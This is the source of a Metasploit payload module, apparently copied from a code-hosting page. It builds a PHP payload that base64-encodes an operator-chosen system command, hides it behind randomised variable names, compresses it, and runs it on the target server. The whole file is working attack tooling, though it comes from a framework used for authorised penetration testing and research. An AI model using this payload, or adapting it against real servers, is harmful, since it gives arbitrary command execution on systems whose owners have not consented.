Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7

8
module MetasploitModule
9

10
  CachedSize = :dynamic
11

12
  include Msf::Payload::Single
13
  include Msf::Payload::Php
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'PHP Execute Command ',
18
      'Description'   => 'Execute a single system command',
19
      'Author'        => [ 'egypt' ],
20
      'License'       => BSD_LICENSE,
21
      'Platform'      => 'php',
22
      'Arch'          => ARCH_PHP
23
      ))
24
    register_options(
25
      [
26
        OptString.new('CMD', [ true, "The command string to execute" ]),
27
      ])
28
  end
29

30
  def php_exec_cmd
31

32
    cmd = Rex::Text.encode_base64(datastore['CMD'])
33
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
34
    shell = <<-END_OF_PHP_CODE
35
    #{php_preamble(disabled_varname: dis)}
36
    $c = base64_decode("#{cmd}");
37
    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
38
    END_OF_PHP_CODE
39

40
    return Rex::Text.compress(shell)
41
  end
42

43
  #
44
  # Constructs the payload
45
  #
46
  def generate(_opts = {})
47
    return php_exec_cmd
48
  end
49
end
50

51